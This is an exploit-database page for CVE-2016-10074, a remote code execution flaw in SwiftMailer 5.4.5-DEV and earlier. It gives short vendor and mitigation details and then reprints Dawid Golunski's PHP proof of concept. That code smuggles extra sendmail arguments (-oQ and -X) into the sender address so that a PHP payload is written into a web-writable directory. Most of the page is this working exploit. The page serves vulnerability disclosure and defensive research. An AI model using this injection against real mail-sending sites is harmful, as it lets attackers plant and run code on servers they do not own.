SwiftMailer - exploit.company

vendor:

SwiftMailer

by:

Dawid Golunski

9,8

CVSS

CRITICAL

Remote Code Execution

CWE

Product Name: SwiftMailer

Affected Version From: SwiftMailer <= 5.4.5-DEV

Affected Version To: SwiftMailer <= 5.4.5-DEV

Patch Exists: YES

Related CWE: CVE-2016-10074

CPE: a:swiftmailer:swiftmailer

Metasploit: https://www.rapid7.com/db/vulnerabilities/debian-cve-2016-10074/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Sendmail MTA

2016

SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)

A vulnerability in SwiftMailer <= 5.4.5-DEV allows attackers to inject malicious parameters into the sendmail command, which can be used to write a malicious payload into a file. The payload is passed in the body of the message and the resulting file will contain the payload. The /var/www/cache directory must be writable by the web user for the exploit to work.

Mitigation:

Upgrade to the latest version of SwiftMailer, which is not vulnerable to this exploit.

Source

Exploit-DB raw data:

<?php
 
/*
 
SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)
 
Discovered/Coded by:
 
Dawid Golunski
https://legalhackers.com
 
Full Advisory URL:
https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html

Exploit code URL:
https://legalhackers.com/exploits/CVE-2016-10074/SwiftMailer_PoC_RCE_Exploit.txt

Follow the feed for updates:

https://twitter.com/dawid_golunski

 
A simple PoC (working on Sendmail MTA)
 
It will inject the following parameters to sendmail command:
 
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fattacker\]
Arg no. 4 == [-oQ/tmp/]
Arg no. 5 == [-X/var/www/cache/phpcode.php]
Arg no. 6 == ["@email.com]


which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
Note /var/www/cache must be writable by www-data web user.

The resulting file will contain the payload passed in the body of the msg:
 
09607 <<< Content-Type: text/html; charset=us-ascii
09607 <<< 
09607 <<< <?php phpinfo(); ?>
09607 <<< 
09607 <<< 
09607 <<< 
 
 
See the full advisory URL for the exploit details.
 
*/
 
 
// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form with sender field
 
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com';

// ------------------
 
// mail() param injection via the vulnerability in SwiftMailer

require_once 'lib/swift_required.php';
// Mail transport
$transport = Swift_MailTransport::newInstance();
// Create the Mailer using your created Transport
$mailer = Swift_Mailer::newInstance($transport);

// Create a message
$message = Swift_Message::newInstance('Swift PoC exploit')
  ->setFrom(array($email_from => 'PoC Exploit Payload'))
  ->setTo(array('receiver@domain.org', 'other@domain.org' => 'A name'))
  ->setBody('Here is the message itself')
  ;
// Send the message with PoC payload in 'from' field
$result = $mailer->send($message);

?>